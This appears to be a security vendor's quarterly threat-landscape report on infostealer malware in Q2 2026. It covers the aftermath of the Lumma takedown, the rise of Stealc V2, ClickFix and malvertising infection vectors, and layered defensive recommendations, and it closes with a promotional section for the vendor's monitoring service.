Top Infostealer Families in Q2 2026: Threat Landscape Report

The infostealer ecosystem entered Q2 2026 in a state of continued recomposition. Twelve months after Operation Lumma disrupted the leading Malware-as-a-Service infostealer of 2024 and 2025, the threat landscape has not contracted, it has diversified. New families have stepped into the gap left by LummaC2’s temporary retreat, older operations such as RedLine continue to circulate as forks and clones, and the initial-access playbook has shifted decisively toward ClickFix social engineering. This report consolidates what Stealed observed across underground sources between April and June 2026, and what those observations mean for security operations teams managing identity and credential risk.

Methodology

Stealed maintains a continuous monitoring pipeline across the channels where infostealer operators publicly distribute, advertise and sell stolen logs. Our coverage spans private Telegram channels (the dominant distribution surface for free and paid stealer logs since 2022), Russian-speaking underground forums, English-language criminal marketplaces, and a set of infostealer command-and-control pipelines that publish samples to closed communities before the data reaches resale channels. The data set behind this report covers the period from April 1 to June 30, 2026.

We deliberately distinguish between two activity signals. The first is distribution volume, meaning how many fresh logs from a given family appear in monitored channels per week. The second is operator interest, meaning how often a family is mentioned, recommended or advertised by affiliates and resellers in those same channels. Distribution volume is a lagging indicator, operator interest is a leading one, and the gap between the two is often where market share shifts hide.

We acknowledge two important limitations. First, our visibility is biased toward Russian-speaking and English-language ecosystems, and underrepresents Chinese and Persian-language criminal forums where infostealer trade also takes place. Second, percentages and rankings reflect what reaches our collection points, not the totality of infections worldwide. For absolute figures, we defer to public sources cited throughout this report.

Q2 2026 Overview

The macro picture in Q2 2026 is best described as fragmentation under pressure. The European Union Agency for Cybersecurity reports in its Threat Landscape 2025 that 4,875 cybersecurity incidents were recorded between July 2024 and June 2025, with credential theft underpinning a substantial share of the initial-access incidents. Verizon’s Data Breach Investigations Report 2025 confirms that stolen credentials remain implicated in 88 percent of web application breaches, a structural figure that has barely moved across three consecutive editions of the report.

Against that backdrop, three trends define Q2 2026. The first is the post-Operation Lumma redistribution of MaaS market share, with Stealc V2 emerging as the most credible technical successor while Vidar stabilizes as the conservative choice for affiliates seeking reliability over novelty. The second is the consolidation of ClickFix as the dominant initial-access technique, eclipsing classic phishing attachments in volume terms across multiple campaigns documented by Microsoft, Proofpoint and others. The third is the continued professionalization of the resale layer, where stolen logs are increasingly sold through tiered subscription services rather than one-shot Telegram drops.

LummaC2: Post-Takedown Landscape

LummaC2 entered 2025 as the dominant commercial infostealer, sold as a service under Russian-speaking branding with affiliate plans starting around 250 USD per month. On May 21, 2025, Microsoft’s Digital Crimes Unit, the United States Department of Justice, Europol and Japan’s Cybercrime Control Center announced a coordinated disruption of the Lumma Stealer infrastructure, seizing or sinkholing more than 2,300 command-and-control domains and severing the operator’s ability to provide reliable service to its affiliates.

The immediate effect was significant. Industry telemetry from multiple vendors observed roughly a 70 percent drop in LummaC2 sample volume during the four to six weeks following the takedown. However, by late summer 2025, variants and partial rebrands had resumed distribution. The MaaS code base was leaked or shared in selected forums, and several smaller operations rebuilt on top of it with new infrastructure. By Q2 2026, LummaC2-derived samples have not returned to their pre-takedown peak, but they continue to represent a meaningful share of the logs we observe, and the family remains in the top three most-distributed strains alongside Vidar and Stealc V2.

The lesson from Lumma confirms a pattern observed since the Emotet disruption of 2021. Takedowns of MaaS infrastructure produce real, measurable, valuable disruption, but they do not eliminate the underlying market. Operator brand equity and code lineage outlive infrastructure, and the affiliate ecosystem migrates within weeks. Defenders should treat such takedowns as windows of reduced pressure, not as resolutions.

RedLine: Variants and Decline

RedLine Stealer dominated the infostealer landscape between 2021 and 2024 and was the most-named family in stolen credential markets for most of that period. The October 2024 Operation Magnus, led by the Dutch National Police in coordination with the FBI and Eurojust, seized RedLine and Meta Stealer infrastructure and identified suspects associated with the operation. The disruption was decisive for the original RedLine commercial service.

What we observe in Q2 2026 is the long tail. RedLine source code variants and clones continue to circulate in underground markets, redistributed by smaller operators who repackage the original payload with new C2 infrastructure and minor obfuscation changes. The family’s share of fresh logs has declined steadily since late 2024 and now sits well below LummaC2 derivatives, Stealc V2 and Vidar in our monitoring. RedLine is no longer a leading commercial product, but it remains a relevant threat because of how widely its code base has been forked. Defenders should expect to keep encountering RedLine artefacts for several more years, even as operator interest moves elsewhere.

Vidar: Maturity and Stability

Vidar represents the conservative end of the infostealer market. The family has been active since at least 2018, and its operators have followed a strategy of incremental refinement rather than disruptive rewrites. The result is a mature code base with stable command-and-control patterns, well-understood evasion techniques, and reliable exfiltration pipelines.

In Q2 2026, Vidar benefits from its stability. Affiliates frustrated by the post-Lumma uncertainty have increasingly favored Vidar for campaigns where reliability matters more than feature parity with newer entrants. The family does not innovate aggressively, and that is precisely its commercial appeal. Vidar logs are predictable, support straightforward parsing, and integrate cleanly into existing resale pipelines. We expect Vidar to retain its current share through the rest of 2026 unless a disruptive law-enforcement action targets the operator directly.

Stealc V2: Emergence

Stealc first appeared in early 2023 as a relatively conventional infostealer marketed in Russian-speaking forums. The release of Stealc V2 in 2025 changed the trajectory. The rewrite introduced a modular architecture, support for plug-in modules, improved configuration via JSON-based panels and meaningful evasion improvements against common endpoint detection logic. Crucially, Stealc V2 was positioned during the post-Lumma vacuum, and a significant share of former LummaC2 affiliates migrated to Stealc V2 during the second half of 2025.

By Q2 2026, Stealc V2 is the most credible technical successor to LummaC2 in the MaaS market. Operator interest, measured by mentions and recommendations in monitored channels, ranks Stealc V2 above all other newcomers. Distribution volume confirms the trend, with Stealc V2 logs now representing one of the largest shares of fresh content in our pipeline. The family is the one to watch for the rest of 2026, and a future law-enforcement action against Stealc V2 infrastructure would mark the next inflection point in the ecosystem.

Acreed and Other Emerging Families

Beyond the top tier, several smaller families warrant mention. Acreed is a 2024-vintage stealer that gained traction in early 2026 thanks to aggressive pricing and an active reseller program, although its share remains marginal compared with the top three. MetaStealer continues to circulate, primarily through forks of leaked code, and shows up in opportunistic campaigns rather than sustained operator-led distribution. On the macOS side, Atomic Stealer (also tracked as AMOS) holds the dominant position for Apple-targeted infostealing, with regular updates and a steady presence in malvertising campaigns aimed at developers, designers and crypto users. macOS infostealer activity grew meaningfully through 2025, and Q2 2026 confirms that the platform is no longer an afterthought for credential theft.

Dominant Infection Vectors in Q2 2026

The most consequential shift of the past twelve months is not which malware family ranks first, it is how that malware reaches victims. ClickFix has established itself as the dominant initial-access technique. The pattern is consistent across campaigns. A user lands on a compromised or attacker-controlled page, encounters a fake CAPTCHA or “verify you are human” prompt, and is instructed to copy a string into the Windows Run dialog or terminal to “complete verification.” The pasted string is in fact a PowerShell command that downloads and executes the infostealer payload. Microsoft has documented multiple ClickFix variants targeting both consumer and enterprise users.

ClickFix is effective for two reasons. First, it bypasses many endpoint controls because the user is the one executing the command, on their own machine, in a context that does not look like a classic email-borne attachment. Second, it exploits user familiarity with CAPTCHA fatigue, where security prompts have become so common that an additional verification step does not raise suspicion.

Alongside ClickFix, three secondary vectors remain highly active. Google Ads malvertising continues to drive significant volume, with attackers buying sponsored slots for popular software keywords (Notion, Slack, Zoom, OBS, AnyDesk, common AI tools) and serving trojanized installers from look-alike domains. Trojanized GitHub releases, often advertised through fake AI tooling repositories or game cheat projects, have become a meaningful distribution channel for both Windows and macOS payloads. Finally, YouTube cracks (videos describing how to obtain pirated software, with descriptions linking to password-protected archives containing infostealers) remain a steady volume contributor, particularly for younger demographics.

Implications for Security Teams

The defensive posture that addresses Q2 2026 infostealer reality has three layers. The first is endpoint resilience. EDR with strong behavioral heuristics, application control where feasible, and tight constraints on PowerShell, mshta and rundll32 execution materially raise the cost of ClickFix-style payloads. PowerShell logging (script block logging, module logging, transcription) should be enabled and forwarded to the SIEM, because retroactive investigation of ClickFix infections depends on it.

The second layer is identity. Infostealers exfiltrate browser-stored credentials and authenticated session cookies, and the cookies are often the more valuable asset because they bypass MFA challenges entirely. The mitigation is twofold: shorten session lifetimes to reduce the window during which a stolen cookie remains useful, and deploy AiTM-resistant MFA wherever possible, with FIDO2 security keys or device-bound passkeys for privileged accounts as the default. Conditional access policies that bind sessions to device posture or network location add a further constraint.

The third layer, and the one that endpoint and identity controls cannot replace, is external monitoring. Once credentials are exfiltrated, they enter resale channels within hours and are typically advertised within a day or two. The post-publication window, between the moment logs appear in Telegram channels or underground markets and the moment they are operationalized by a buyer, is where defenders can still act, but only if they have visibility into those channels. Integrating external dark web and Telegram monitoring alerts directly into the SIEM or SOAR pipeline allows the SOC to trigger automated password resets, session revocations and conditional access policy changes for affected accounts, often before the credentials are used.

CISOs should pair this technical posture with a strategic conversation about acceptable exposure. Infostealers are opportunistic by design and will infect employees, contractors and even personal devices with corporate credentials saved in browsers. The objective is not zero exposure, it is short time-to-detection and short time-to-revocation.

Methodology and Limitations

We deliberately avoid publishing precise market share percentages attributed to Stealed, because such figures are sensitive to collection bias and cannot be independently verified by the reader. The qualitative rankings in this report (top three families, leading initial-access vector, declining versus rising operators) reflect convergent signals across distribution volume, operator interest and reseller positioning. Where precise figures are useful, we cite public sources: ENISA, Verizon, Microsoft, IBM X-Force, and the MITRE ATT&CK entry for LummaC2 (S1213). The IBM X-Force Threat Intelligence Index 2025 provides additional context on credential abuse trends consistent with the picture described here.

This report is a snapshot. The infostealer ecosystem moves quickly, and the rankings that hold in Q2 2026 may shift meaningfully by Q4. We publish updates quarterly precisely to track that movement.

Frequently Asked Questions

Which infostealer family was most active in Q2 2026? Despite the May 2025 Microsoft and DOJ takedown (Operation Lumma) that disrupted 2,300+ command-and-control domains, LummaC2 variants regained activity in late 2025 and remain among the top three most-distributed families in Q2 2026, alongside Vidar and Stealc V2.

What is the dominant infection vector in 2026? ClickFix fake CAPTCHA prompts, malvertising via Google Ads, trojanized GitHub releases and YouTube cracks dominate. ClickFix specifically tricks users into pasting malicious PowerShell into their own terminal, bypassing many endpoint controls.

Did Operation Lumma actually reduce LummaC2 activity? Temporarily yes (estimated 70 percent volume drop in the weeks following May 2025), but variants resumed distribution within months under partial rebranding. Takedowns slow but do not eliminate MaaS infostealer ecosystems.

What sectors are most targeted? Financial services, SaaS providers, e-commerce, gaming and crypto wallets dominate the victimology, mirroring the credential value of accounts in those sectors. Infostealers are opportunistic by design and infect any victim regardless of sector.

How can security teams respond? Layer EDR with strong heuristics, AiTM-resistant MFA (FIDO2 where possible), short session lifetimes, and external dark web monitoring covering Telegram channels and underground forums. Endpoint controls alone miss the post-publication window where credentials are already on sale.

About Stealed

Stealed monitors more than 100 million credentials per day across private Telegram channels, underground forums and dark web marketplaces, and surfaces leaks affecting your domains, employees and customers within minutes of publication. If your organization wants to understand its current exposure or close the post-publication window described in this report, discuss your exposure with our CTO or receive the next quarterly threat report directly in your inbox.